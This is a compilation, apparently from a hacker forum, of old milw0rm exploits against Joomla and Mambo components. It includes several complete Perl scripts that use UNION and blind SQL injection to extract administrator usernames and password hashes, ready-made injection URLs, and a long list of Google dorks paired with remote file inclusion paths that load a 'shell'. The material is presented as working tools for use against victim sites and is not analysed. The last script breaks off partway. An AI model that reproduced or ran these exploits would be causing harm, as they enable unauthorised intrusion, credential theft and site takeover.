# Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection #
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24
################################################## #######

########################################
# Founded by : Houssamix From H-T Team
# H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
# Dork inurl:"index.php?option=com_xsstream-dm"
# Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :)

########################################
# Script_Name: "Joomla"
# Component_Name: "xsstream-dm" 0.01 Beta
########################################

print "\t\t############################################## ##########\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t############################################## ##########\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n";
print "\t\t# by Houssamix & Stack-Terrorist #\n\n";
print "\t\t# from H-T Team & v4 Team #\n\n";
print "\t\t############################################## ##########\n\n";

use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
#the the union of joomla
$un="/**/union/**/select/**/";
#the vulnerable compenent
$com="com_xsstream-dm&Itemid";
# Lets star exploiting
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2/**/from/**/".$tab."/**";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){

print "\n[+] Admin User : $1";
}
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2/**/from/**/".$tab."/**";

$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;

if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";
}

else{print "\n[-] Exploit Failed...\n";}

# exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terrorist

(c) by Houssamix & Stack-Terrorist

Joomla Component com_galeria Remote SQL Injection Vulnerability
################################################## #############
#
# joomla SQL Injection(com_galeria)
#
################################################## #############
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################## ##############
#
# DORK 1 : allinurl: "com_galeria"
#
# DORK 2 : allinurl: id "com_galeria"
#
################################################## ##############
EXPLOIT :

index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444 ,555,666,username/**/from/**/users/*

################################################## ##############
# S@BUN i AM NOT HACKER S@BUN
################################################## ##############

Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице
http://www.domain.ru/path/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку
DB function failed with error number 1062
Duplicate entry '1-83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ( 1, '83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' )
работает не на всех версиях
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1

Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице

позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку

работает не на всех версиях
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Эм... Как бы ты этом и основан мой эксплойт=\ Только префикс у меня не играет роли, ибо #__ заменяется на текущий префикс при обработке его соответствующей функцией в джумле

Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
################################################## #############
#
# joomla com_garyscookbook SQL Injection(id)
#
################################################## #############
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################## ##############
#
# there are alot site but exploit not working for all ı found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################## ##############
EXPLOIT :

index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0 ,username+from%2F%2A%2A%2Fmos_users/*


################################################## ##############
# S@BUN i AM NOT HACKER S@BUN
################################################## ##############

<name>garyscookbook</name>
<creationDate>4-9-2005</creationDate>
<author>Gerald Berger</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>gerald@vb-dozent.net</authorEmail>

<authorUrl>www.vb-dozent.net</authorUrl>
<version>1.1.1</version>
<description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>

нашел у себя на компе, хз может баян
inurl:"com_flyspray"

Site Sonuna:

/components/com_flyspray/startdown.php?file=shell



Google Dork:

inurl:"com_admin"

Site Sonuna:

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell



Google Dork:

inurl:index.php?option=com_simpleboard

Site Sonuna:

/components/com_simpleboard/file_upload.php?sbp=shell


Google Dork:
inurl:"com_hashcash"

Site Sonuna:

/components/com_hashcash/server.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_htmlarea3_xtd-c"

Code:

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_sitemap"

Code:

/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_performs"

Site Sonuna:
components/com_performs/performs.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_forum"

Site Sonuna:
/components/com_forum/download.php?phpbb_root_path=



Google Dork:
inurl:"com_pccookbook"

Site Sonuna:

components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell



Google Dork:
inurl:index.php?option=com_extcalendar

Site Sonuna:

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"minibb"

Site Sonuna:
components/minibb/index.php?absolute_path=shell



Google Dork:
inurl:"com_smf"

Site Sonuna:
/components/com_smf/smf.php?mosConfig_absolute_path=
Site Sonuna2:
/modules/mod_calendar.php?absolute_path=shell



Google Dork:
inurl:"com_pollxt"

Site Sonuna:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

Google Dork:
inurl:"com_loudmounth"

Site Sonuna:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_videodb"

Site Sonuna:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l



Google Dork:
inurl:index.php?option=com_pcchess

Site Sonuna:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_multibanners"

Site Sonuna:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell



Google Dork:
inurl:"com_a6mambohelpdesk"

Site Sonuna:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l



Google Dork:
inurl:"com_colophon"

Site Sonuna:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_mgm"

Site Sonuna:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

Google Dork:
inurl:"com_mambatstaff"

Site Sonuna:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_securityimages"

Site Sonuna:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

Site Sonuna2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_artlinks"

Site Sonuna:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_galleria"

Site Sonuna:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_akocomment"

Site Sonuna:
/akocomments.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_cropimage"

Site Sonuna:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell



Google Dork:
inurl:"com_kochsuite"

Site Sonuna:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_comprofiler"

Site Sonuna:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_zoom"

Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_serverstat"

Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll



Google Dork:
inurl:"com_fm"

Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=shell




Google Dork:
inurl:com_mambelfish

Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell




Google Dork:
inurl:com_lmo


Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_linkdirectory


Site Sonuna:
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell




Google Dork:
inurl:com_mtree


Site Sonuna:
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell





Google Dork:
inurl:com_jim


Site Sonuna:
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_webring


Site Sonuna:
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell





Google Dork:
inurl:com_remository


Site Sonuna:
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=



Google Dork:
inurl:com_babackup


Site Sonuna:
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_lurm_constructor


Site Sonuna:
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell






Google Dork:
inurl:com_mambowiki


Site Sonuna:
components/com_mambowiki/ MamboLogin.php?IP=shell




Google Dork:
inurl:com_a6mambocredits


Site Sonuna:
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell






Google Dork:
inurl:com_phpshop


Site Sonuna:
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell






Google Dork:
inurl:com_cpg


Site Sonuna:
components/com_cpg/cpg.php?mosConfig_absolute_path=shell






Google Dork:
inurl:com_moodle


Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=shell




Google Dork:
inurl:com_extended_registration


Site Sonuna:
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell

Google Dork:
inurl:com_mospray


Site Sonuna:
components/com_mospray/scripts/admin.php?basedir=shell

Google Dork:
inurl:com_bayesiannaivefilter

Site Sonuna:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_uhp

Site Sonuna:
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_peoplebook

Site Sonuna:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_mmp

Site Sonuna:
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_reporter

Site Sonuna:
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_madeira

Site Sonuna:
/components/com_madeira/img.php?url=shell


Google Dork:
inurl:com_jd-wiki

Site Sonuna:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_bsq_sitestats

Site Sonuna:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Site Sonuna2:
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell

Dork:

com_comprofiler

Expl:
administrator/components/com_comprofiler/plugin.class.
php?mosConfig_absolute_path=[Shell]



Dork:
inurl:com_multibanners

Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:com_colophon

expl:
administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]


Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:"com_hashcash"


Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"

Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"

Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

--
Dork:
inurl:"com_forum"

Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"

Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_extcalendar

Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"minibb"

Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"

Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]


Expl:
/modules/mod_calendar.php?absolute_path=[Shell]

Dork:
inurl:"com_pollxt"

Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_loudmounth"

Expl:
/components/com_loudmounth/includes/abbc/abbc.class.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"

Expl:
/components/com_videodb/core/videodb.class.xml.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_pcchess

Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_multibanners"

Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_a6mambohelpdesk"

Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.
php?mosConfig_live_site=[Shell]

Dork:
inurl:"com_colophon"

Expl:
/administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mgm"

Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mambatstaff"

Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_securityimages"

Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_artlinks"

Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"

Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit


#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## ###########\n";
print " # Joomla Component mycontent Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl mycontent.pl host path <options> #\n";
print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n";
print " # #\n";
print " # Options: #\n";
print " # -r Valid id #\n";
print " # Note: #\n";
print " # If the exploit failed #\n";
print " # Change 'regexp' value to the title of the page #\n";
print " ################################################## ###########\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $rid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"r"})
{
$rid = $options{"r"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "E-mail";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

# milw0rm.com [2008-06-01]




Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit



#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## ###########\n";
print " # Joomla Component Joo!BB Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl jobb.pl host path <options> #\n";
print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -f Forum id #\n";
print " # Note: #\n";
print " # If you need to change the match value so do it :D #\n";
print " ################################################## ###########\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"f"})
{
$fid = $options{"f"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $fid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Announcements";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

# milw0rm.com [2008-06-01]


milw0rm.com

Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## ###########\n";
print " # Joomla Component acctexp Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl acctexp.pl host path <options> #\n";
print " # Example: perl acctexp.pl www.host.com /joomla/ -g 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -g usage id #\n";
print " # Note: #\n";
print " # Don't forget to change the match if you have to do it :)#\n";
print " ################################################## ###########\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $gid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"g"})
{
$gid = $options{"g"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Verify Password";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

Joomla Component jotloader <= 1.2.1.a Blind SQL injection

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooo\n";
print " o Joomla Component jotloader Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Conctact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:com_jotloader o\n";
print " o Usage: perl jotloader.pl host path <options> o\n";
print " o Example: perl jotloader.pl www.host.com /joomla/ -c 5 o\n";
print " o o\n";
print " o Options: o\n";
print " o -c valid cid id o\n";
print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooo\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $cid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"c"})
{
$cid = $options{"c"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $cid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "files.download";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}


# milw0rm.com [2008-06-04]

Joomla Component EasyBook 1.1 SQL Injection Exploit
#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example: #
# Host: artsbymonique.lu #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gbid= --+-\n";
print "-+-- Dork: com_easybook --+-\n\n";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket "POST /index.php HTTP/1.0\n".
"Host: www.$host\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: 214\n\n".
"option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,p assword,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19+from+jos_users/*&md=$md\n";
while(<$socket>)
{
$s = <$socket>;
if($s=~/:::(.+):::/){
$lhs = $1;
($l,$h,$s)=split(':',$lhs);
print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
close $socket;
exit; }
}
die ("Exploit failed!");



:) POST only

Joomla Component simpleshop <= 3.4 SQL injection

/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/


Author : His0k4 [ALGERIAN HaCkEr]

Dork : inurl:com_simpleshop
Dork : inurl:com_simpleshop "catid"

POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}

Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user(),user() FROM jos_users--


------------------------------------------------------------------------

Greetings : Str0ke, all friends & muslims HaCkeRs...

milw0rm.com [2008-06-05]

http://beenuarora.com/code/joomsq.py

Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

/---------------------------------------------------------------\
\ /
/ Joomla Component GameQ Remote SQL injection \
\ /
\---------------------------------------------------------------/


Author : His0k4 [ALGERIAN HaCkEr]

POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}

Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10, 11,12,13,14 FROM jos_users--

Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooo\n";
print " o Joomla Component yvcomment Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Conctact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:yvcomment o\n";
print " o Usage: perl yvcomment.pl host path <options> o\n";
print " o Example: perl yvcomment.pl www.host.com /joomla/ -a 2 o\n";
print " o o\n";
print " o Options: o\n";
print " o -a valid Article id o\n";
print " o Note: o\n";
print " o You can Change the match string by any content of the correct query o\n";
print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooo\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"a"})
{
$aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "DateAndAuthor";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

# milw0rm.com [2008-06-08]

Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit

#!/usr/bin/perl
#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
#[[Coded by : MEFISTO
#[[Author : ilker Kandemir
#[[Dork : "index.php?option=com_news_portal" or "Powered by iJoomla News Portal"

use IO::Socket;
if(@ARGV < 1){
print "
[[================================================== ======================
[[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
[[// Usage: cnp.pl [target]
[[// Example: cnp.pl victim.com
[[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO
